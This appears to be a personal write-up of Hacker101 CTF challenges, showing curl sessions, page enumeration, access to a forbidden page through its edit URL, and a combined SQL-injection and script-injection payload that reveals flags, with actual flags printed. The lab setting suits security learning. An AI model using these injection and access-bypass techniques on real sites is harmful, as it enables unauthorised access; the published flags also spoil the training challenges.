Hacker101 CTF

Introduction

Hacker101 CTF seems to be a new CTF setup by HackerOne, the bug bountry program. Flag formats are meant to be similar to ^FLAG^37ae568362f974017fa575f08cd215044cd6bb395c3f5e5e293ee5324ba6769c$FLAG$. Requires a HackerOne account to login. Additional instruction can be found at https://docs.hackerone.com/hackers/hacker101.html.

The challenge difficulty ranking is done using trivial, easy, moderate, hard, and expert. Points are allocated according to difficulty and range from 1 point for trivial to 9 points for expert. Each challeneg may have multiple flag indicated by the completion. The minimum number of flags per challenge was 1, with a maximum of 7 for the Postbook challenge.

WARNING: This post containd actual flags

Trivial (1 / flag) A little something to get you started Web

  • Naviagtes to http://35.227.24.107/a5fa082820/
curl -v http://35.227.24.107/a5fa082820/
*   Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:11:47 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 194
< Connection: keep-alive
<

<!doctype html>
<html>
        <head>
                <style>
                        body {
                                background-image: url("background.png");
                        }
                </style>
        </head>
        <body>
                <p>Welcome to level 0.  Enjoy your stay.</p>
        </body>
</html>
* Connection #0 to host 35.227.24.107 left intact
  • Hint: Take a look at the source for the page
  • Attempted http://35.227.24.107/a5fa082820/background.png
curl -v http://35.227.24.107/a5fa082820/background.png
*   Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /a5fa082820/background.png HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:16:02 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 76
< Connection: keep-alive
<
^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$* Connection #0 to host 35.227.24.107 left intact
  • Submitted: ^FLAG^1f94a742389ba3056871e45aeb087073ba8f283898ebaab7ba833e8277a0d6d6$FLAG$

Easy (2 / flag) Micro-CMS v1 Web

  • Navigated to http://35.227.24.107/06e5e5463a/
curl -v http://35.227.24.107/06e5e5463a/
*   Trying 35.227.24.107...
* TCP_NODELAY set
* Connected to 35.227.24.107 (35.227.24.107) port 80 (#0)
> GET /06e5e5463a/ HTTP/1.1
> Host: 35.227.24.107
> User-Agent: curl/7.55.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.14.0 (Ubuntu)
< Date: Fri, 20 Mar 2020 09:18:32 GMT
< Content-Type: text/html; charset=utf-8
< Content-Length: 236
< Connection: keep-alive
<

<!doctype html>
<html>
        <head>
                <title>Micro-CMS</title>
        </head>
        <body>
                <ul>
<li><a href="page/1">Testing</a></li>
<li><a href="page/2">Markdown Test</a></li>
                </ul>
                <a href="page/create">Create a new page</a>
        </body>
</html>
* Connection #0 to host 35.227.24.107 left intact
  • Manually navigated the site and explored the page preview and edit function, also created a page, and noticed that the page number was page 13
  • Iterated through all pages from 1 - 13 to a file for manual review using for /l %i in (1,1,13) do ( curl -v http://35.227.24.107/06e5e5463a/page/%i ) >> Micro-CMS_v1.txt
  • Majority of pages returned error messages indicating that the page was not found
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server.  If you entered the URL manually please check your spelling and try again.</p>
  • However, one page returned a different message indicating that the page may be protected, i.e. page 6
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>403 Forbidden</title>
<h1>Forbidden</h1>
<p>You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.</p>
  • Attemped to edit the page by editing the test page I had created and then changing the query string to page siz, i.e. http://35.227.24.107/06e5e5463a/page/edit/6
  • Found a flag
My secret is ^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
  • Submitted: ^FLAG^d6e25557ba5ce9423124db276973561451066875069feacf638d8ae2d29aa5ae$FLAG$
  • Realised that this challenge had multiple flags, could not find anything else, so went to hints for the challenge and got

Hints for "Micro-CMS v1"
Flag0 -- Found

    Try creating a new page
    How are pages indexed?
    Look at the sequence of IDs
    If the front door doesn't open, try the window
    In what ways can you retrieve page contents?

Flag1 -- Not Found
You don't have any hints for this flag yet.
Flag2 -- Not Found
You don't have any hints for this flag yet.
Flag3 -- Not Found
You don't have any hints for this flag yet. 
  • Clicked on Get a hint button and got Make sure you tamper with every input
  • Attempted basic SQL injection - no result
  • Attempted Javascript injection - <script> tags replaced with <scrubbed>in the CMS page, and < and > replaced by &lt; and &gt;, so some input sanitisation is occuring
  • ' OR 1=1; --x <Script>alert("hello world");
  • It wasn’t unit the <-- Go Home link is clicked that the Javascript inject actually triggers
  • We get a Javascript pop-up with the flag
  • Submitted: ^FLAG^468c7fb39ff2b5b8d10eff89231d39521e430bef688904069211feedb5215d11$FLAG$
  • Since the Javascript triggered on the home page, manually navigated to all other pages and edit pages to see if another script triggered.
  • Discovered: that on the Markdown Test page, cannot save the page because the URL to the adorable kitten is broken.
  • Tried injecting in the CMS page content and manually navigated to other pages
kush  notes 

See also